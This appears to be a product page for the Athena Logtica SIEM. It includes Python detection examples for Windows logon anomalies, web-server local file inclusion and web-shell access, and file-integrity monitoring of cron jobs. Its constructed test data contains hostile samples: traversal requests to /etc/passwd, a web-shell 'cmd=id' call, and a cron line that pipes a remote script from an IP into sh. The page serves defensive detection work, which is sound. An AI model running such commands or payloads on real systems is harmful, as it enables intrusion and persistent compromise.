
Athena Logtica

SIEM from the Expert Minds of a SOC (Security Operations Center)

Collection - From All Relevant Data Sources


Working together with Athena CTI (Cyber Threat Intelligence), Athena Logtica is a security information and event management (SIEM) system that collects from all relevant data sources: network infrastructure, server logs, endpoint agents and remote monitoring.


Discovery - More Than Just Statistics of Collection


Flashy dashboards are nice to have, but someone has to look at them 24x7. Without appropriate rules for identifying Indicators of Compromise (IoCs), a SIEM is only a store of collected logs. Athena Logtica includes default detection rules designed and updated by the security analysts of our SOCs. These rules cover NetFlow, DNS and HTTP anomalies, Windows Active Directory servers and file servers, web servers, firewalls, etc. A user interface is available for adding or changing rules, a scheduler runs the rules, and a notification module sends an email if a rule finds something. Most SIEMs stop here.


Analysis - Attempting To Draw Conclusions


However, a single IoC is rarely conclusive for security incidents such as account takeover (ATO), system compromise or data exfiltration. Experienced security analysts are needed to draw conclusions from several indicators together. Look out for Athena Analytica, our forthcoming solution for this analysis step.

Every day, on average, a SIEM...

30 GB of logs collected
41,501 queries processed
235 alerts generated
0 actionable alerts

Athena Logtica

Packaged Software Appliance

No more DIY - Athena NetFlow, Athena CTI, Athena Netica and Athena Logtica, combined with a just-enough operating system (JeOS), run optimally in a virtual machine and are up and running in minutes.

Anomaly Detections

Statistical anomaly rules monitor collected server logs and alert on any sudden increase in the count of an indicator; behavioural anomaly rules detect, for example, privileged access from a new network location.

Windows Active Directory & File Server

Monitor all user logons in a domain and flag events such as a privileged account being created at 3 a.m., or an unusually high volume of file access on a file server by a single user account.
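The two passages above describe three kinds of rule: a privileged change at an odd hour, a privileged logon from a network the account has never used, and a statistical spike in one user's activity. The block below is an added example of how such rules can be expressed over normalised Windows Security events; it is not Athena Logtica's rule language or data format. The event IDs (4728, 4624, 4663) are the real Windows Security IDs, but the flat field names, the business-hours window, the privileged-group and privileged-account lists, the known admin networks and all sample events are constructed assumptions.

```python
"""Three detection rules over constructed Windows Security events.
Added example, not Athena Logtica's own rules or data format."""
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network
from statistics import mean, pstdev

# Event IDs are the real Windows Security IDs; the flat field names are assumed
# (a SIEM would normalise the EVTX/XML record into something like this).
#   4728 = member added to a security-enabled global group
#   4624 = successful logon
#   4663 = an attempt was made to access an object (file-server auditing)
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins"}   # assumed
PRIVILEGED_ACCOUNTS = {"adm.kim"}                             # assumed
KNOWN_ADMIN_NETS = [ip_network("10.1.0.0/16")]                # assumed learned baseline
BUSINESS_HOURS = range(7, 20)                                 # 07:00-19:59 local time

# Constructed sample events.
EVENTS = [
    {"time": "2024-03-05T09:30:00", "id": 4624, "user": "adm.kim", "src": "10.1.5.9"},
    {"time": "2024-03-05T09:35:00", "id": 4624, "user": "jdoe", "src": "10.1.20.14"},
    # 03:04: a service account is added to Domain Admins, then the admin logs on from the Internet.
    {"time": "2024-03-06T03:04:00", "id": 4728, "user": "svc_backup", "group": "Domain Admins", "actor": "adm.kim"},
    {"time": "2024-03-06T03:05:00", "id": 4624, "user": "adm.kim", "src": "203.0.113.77"},
    {"time": "2024-03-06T11:00:00", "id": 4728, "user": "jdoe", "group": "Sales", "actor": "adm.kim"},
]

# Constructed daily file-server access counts (4663) per user, expanded into events.
FILE_ACCESS_PER_DAY = {
    "jdoe":    {"2024-03-01": 40, "2024-03-02": 45, "2024-03-03": 38, "2024-03-04": 42, "2024-03-05": 600},
    "adm.kim": {"2024-03-01": 5,  "2024-03-02": 6,  "2024-03-03": 4,  "2024-03-04": 5,  "2024-03-05": 5},
}
EVENTS += [
    {"time": f"{day}T12:00:00", "id": 4663, "user": user}
    for user, days in FILE_ACCESS_PER_DAY.items()
    for day, n in days.items()
    for _ in range(n)
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def privileged_change_off_hours(events):
    """Membership added to a privileged group outside business hours."""
    return [e for e in events
            if e["id"] == 4728 and e.get("group") in PRIVILEGED_GROUPS
            and _ts(e).hour not in BUSINESS_HOURS]


def privileged_logon_new_location(events):
    """Privileged-account logon from a source outside the known admin networks."""
    hits = []
    for e in events:
        if e["id"] != 4624 or e["user"] not in PRIVILEGED_ACCOUNTS:
            continue
        src = ip_address(e["src"])
        if not any(src in net for net in KNOWN_ADMIN_NETS):
            hits.append(e)
    return hits


def file_access_spike(events, z=3.0, min_baseline_days=3):
    """Per-user 4663 count on the latest day compared with that user's earlier days.

    Flags when today's count exceeds mean + z * stddev of the baseline days.
    Returns {user: (day, count, threshold)}.
    """
    per_user_day = defaultdict(lambda: defaultdict(int))
    for e in events:
        if e["id"] == 4663:
            per_user_day[e["user"]][e["time"][:10]] += 1
    alerts = {}
    for user, days in per_user_day.items():
        ordered = sorted(days)
        baseline = [days[d] for d in ordered[:-1]]
        today = days[ordered[-1]]
        if len(baseline) < min_baseline_days:
            continue  # not enough history to judge
        threshold = mean(baseline) + z * pstdev(baseline)
        if today > threshold:
            alerts[user] = (ordered[-1], today, round(threshold, 1))
    return alerts


if __name__ == "__main__":
    for rule in (privileged_change_off_hours, privileged_logon_new_location, file_access_spike):
        print(rule.__name__, rule(EVENTS))
```

On the constructed data the first rule fires once (svc_backup added to Domain Admins at 03:04), the second fires once (adm.kim from 203.0.113.77) and the third flags jdoe, whose 600 accesses on the last day far exceed a baseline of roughly 40 per day. Note that the 03:04 group change and the 03:05 out-of-network logon come from the same actor a minute apart; that correlation across rules is the "analysis" step the page says a single IoC cannot provide.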

Web Server

An attempt to read /etc/passwd is an obvious local file inclusion (LFI) attempt; an attacker uploads a web shell and then accesses it on the web server, receiving response code 200, etc.
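As an added example of the two web-server rules just described (not Athena Logtica's own rules), the block below parses constructed Apache combined-format log lines, URL-decodes each request so that encoded traversal such as %2e%2e%2f is caught as well as the literal /etc/passwd case, and then correlates a POST from one source with a later 200 response to a script under the upload directory. The log lines, the upload directory name /uploads/, the upload endpoint and the list of script extensions are all assumptions.

```python
"""Web-server detection rules over constructed Apache combined-format log lines.
Added example; not Athena Logtica's own rules."""
import re
from urllib.parse import unquote

# Constructed sample log lines (Apache/Nginx "combined" format), in time order.
LOG_LINES = """\
198.51.100.23 - - [05/Mar/2024:10:15:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.23 - - [05/Mar/2024:10:15:09 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
198.51.100.23 - - [05/Mar/2024:10:15:20 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 221 "-" "curl/8.1"
198.51.100.23 - - [05/Mar/2024:10:16:01 +0000] "POST /upload.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.23 - - [05/Mar/2024:10:16:05 +0000] "GET /uploads/avatar.php?cmd=id HTTP/1.1" 200 93 "-" "Mozilla/5.0"
203.0.113.8 - - [05/Mar/2024:10:17:30 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 40212 "-" "Mozilla/5.0"
"""

COMBINED = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse(lines):
    """Parse combined-format lines into dicts; unparseable lines are skipped."""
    records = []
    for line in lines.splitlines():
        m = COMBINED.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["status"] = int(rec["status"])
        # Decode twice so double-encoded traversal (%252e%252e) is normalised too.
        rec["url_dec"] = unquote(unquote(rec["url"]))
        records.append(rec)
    return records


# Traversal sequences and classic LFI targets; matched on the decoded URL.
LFI_PATTERN = re.compile(r"(\.\./|\.\.\\|/etc/passwd|/proc/self/environ|php://)", re.I)
UPLOAD_DIR = "/uploads/"   # assumed: user uploads live here and must never execute
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|jsp|aspx?|cgi)$", re.I)


def lfi_attempts(records):
    """Any request whose decoded URL carries a traversal or a known LFI target.

    An attempt is reported regardless of status code: a 404 still shows intent.
    """
    return [r for r in records if LFI_PATTERN.search(r["url_dec"])]


def _is_shell_hit(rec):
    path = rec["url_dec"].split("?", 1)[0]
    return path.startswith(UPLOAD_DIR) and bool(SCRIPT_EXT.search(path)) and rec["status"] == 200


def webshell_access(records):
    """A script under the upload directory answered with 200: the shell is live."""
    return [r for r in records if _is_shell_hit(r)]


def upload_then_shell(records):
    """Correlate a POST from a source with its later successful request to a script in UPLOAD_DIR.

    Assumes records are in time order. Returns (src, upload_url, shell_url) tuples.
    """
    last_post = {}
    chains = []
    for r in records:
        if r["method"] == "POST":
            last_post[r["src"]] = r["url_dec"]
        elif _is_shell_hit(r) and r["src"] in last_post:
            chains.append((r["src"], last_post[r["src"]], r["url_dec"]))
    return chains


if __name__ == "__main__":
    recs = parse(LOG_LINES)
    print("LFI attempts:", [(r["src"], r["url"], r["status"]) for r in lfi_attempts(recs)])
    print("Web shell hits:", [(r["src"], r["url"]) for r in webshell_access(recs)])
    print("Upload -> shell chains:", upload_then_shell(recs))
```

Both /etc/passwd requests are reported, including the encoded one that the server answered with 404, while the JPEG under /uploads/ is not, because only a script extension with a 200 response counts as a working shell.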

Host based Security Monitoring

File integrity monitoring discovers that a new scheduled job was created; performance monitoring discovers that CPU utilisation has exceeded 85% for the past hour, etc.
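The file integrity check above works by comparing a baseline snapshot of a watched directory with a later one. The block below is an added example of that snapshot-and-diff logic (not Athena Logtica's agent): it simulates a scheduled-job directory such as /etc/cron.d in a temporary directory, records SHA-256 digests and permission bits, and reports files that were added, removed or modified. The cron entries are constructed.

```python
"""File-integrity snapshot and diff over a scheduled-job directory.
Added example; not Athena Logtica's host agent."""
import hashlib
import tempfile
from pathlib import Path


def snapshot(root):
    """Map each regular file under root (relative path) to (sha256, permission bits)."""
    root = Path(root)
    snap = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            digest = hashlib.sha256(p.read_bytes()).hexdigest()
            snap[str(p.relative_to(root))] = (digest, p.stat().st_mode & 0o777)
    return snap


def diff(before, after):
    """Compare two snapshots; a changed digest or changed mode counts as modified."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(k for k in before.keys() & after.keys() if before[k] != after[k]),
    }


def demo():
    """Simulate /etc/cron.d: take a baseline, then an attacker drops a job and edits another."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed baseline content.
        Path(d, "logrotate").write_text("0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n")
        baseline = snapshot(d)
        # Constructed changes: a new job that pulls and runs a remote script, plus an edited job.
        Path(d, "update").write_text("*/5 * * * * root curl -s http://203.0.113.9/a.sh | sh\n")
        with Path(d, "logrotate").open("a") as f:
            f.write("@reboot root /tmp/.x\n")
        return diff(baseline, snapshot(d))


if __name__ == "__main__":
    print(demo())
```

A real agent would persist the baseline off-host (an attacker with root can rewrite a local one), run the comparison on a schedule, and raise the "added" entries for job directories as alerts in their own right.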

Remote Monitoring

WebWatch downloads designated web pages periodically to verify their availability and check for the presence of malicious content; DNSWatch periodically checks online whether the mapping between a DNS hostname and its IP address(es) has changed.

Key Benefits

Actionable Security Intelligence

Use the entire network as a sensor by turning the massive amount of data from existing network infrastructure into actionable security intelligence.

Faster Threat Detection

By combining network visibility with cyber threat intelligence, threats can be detected faster and more comprehensively.

Affordable & Working

Athena NetFlow is affordable, easy to install and a working network security monitoring solution, good for SMEs like us.